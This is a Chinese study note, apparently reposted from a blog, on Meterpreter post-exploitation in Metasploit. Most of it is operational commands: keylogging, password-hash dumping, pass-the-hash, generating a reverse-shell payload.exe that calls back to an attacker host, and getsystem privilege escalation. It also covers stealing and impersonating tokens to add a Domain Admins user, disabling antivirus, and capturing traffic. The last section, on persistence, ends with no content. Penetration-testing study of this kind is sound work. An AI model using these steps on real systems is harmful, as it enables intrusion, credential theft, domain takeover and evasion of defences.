Metasploit 读书笔记-神器Meterpreter

一、基本命令

  1. 截屏

screenshot

2.获取系统平台信息

sysinfo

3.进程信息

ps

4.获取键盘记录

查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--

run post/windows/capture/keylog_recorder

过一段时间CTRL+C中止。

最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。


5.提取密码哈希

use priv运行特权账号

run post/windows/gather/hashdump

6.传递hash值

use windows/smb/psexec

set PAYLOAD windows/meterpreter/reverse_tcp

7.权限提升

当我们获得了目标系统的访问权限,可以通过net user命令创建限制权限的普通用户帐号。

XP系统中:

net user bob password123 /add.

然后,创建一个基于Meterpreter的攻击程序payload.exe,复制到目标XP机器上,并在bob用户下运行。

利用攻击载荷生成器(msfpayload)来创建Windows可执行文件格式的Meterpreter攻击载荷程序payload.exe.

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp

LHOST=192.168.33.139 LPORT=443 X>payload.exe

root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp

LHOST=192.168.33.139 LPORT=443 E

meterpreter> getuid

创建载荷时,设置LHOST和LPORT参数指示了反向shell连接到攻击机的地址和端口443,

随后调用msfcli接口进行监听并等待连接,当有连接到达时,将会开启Meterpreter的shell。

shell

use priv

getsystem

getuid

8.令牌假冒

在令牌假冒攻击中,我们获取目标系统中的一个Kerberos令牌,将其用在身份认证环节,来假冒当初创建这个令牌的用户。这是Meterpreter最强大的功能之一。

用户登录服务器时,一个Kerberos令牌会在服务器上在一段时间内保持有效。

我们就可以利用这个令牌入侵系统,而不需破解他的密码。

9.使用PS

使用PS查看进程

使用steal_token命令和PID参数,盗取域管理员用户的令牌。PID为域管理员运行的进程

另外,有些情况下PS命令不能列出域管理员运行的进程,我们可以使用incognito命令列出系统中可用的令牌。

最好是同时检查ps命令和incognito命令的输出结果。

通过use incognito命令加载incognito模块,然后通过list_tokens -u列出令牌。

假冒令牌:

impersonate_token ****\***(注意双斜杠)

添加用户:

add_user omgcom password123 -h 192.168.33.50(域控)

赋予域管理员权限:

add_group_user "Domain Admins" omgcom -h 192.168.33.50


10.跳板攻击(Pivoting)

允许从Meterpreter 终端攻击网络中的其他系统。

跳板攻击允许你使用已经取得控制的Meterpreter终端来攻击内部网络中的其他机器。

11.使用Meterpreter脚本

run 脚本名字

12.迁移进程

攻击系统时常常利用IE漏洞等,如果目标主机关闭了浏览器,Meterpreter会话也随之关闭,从而导致目标丢失。

渗透以后要将会话迁移到内存空间稳定的、不会关闭的服务进程中,以维持稳定的控制。

run post/windows/manage/migrate

13.关闭杀毒软件

run killav

14。获取系统密码hash

run hashdump

15.查看目标所有流量

run packetrecorder -i 1

16.获取系统信息

Scraper脚本可以获取用户名、密码、注册表、哈希值、收集系统信息等。

run scraper

17。控制持久化


原文地址:https://www.cnblogs.com/arhatlohan/p/4217038.html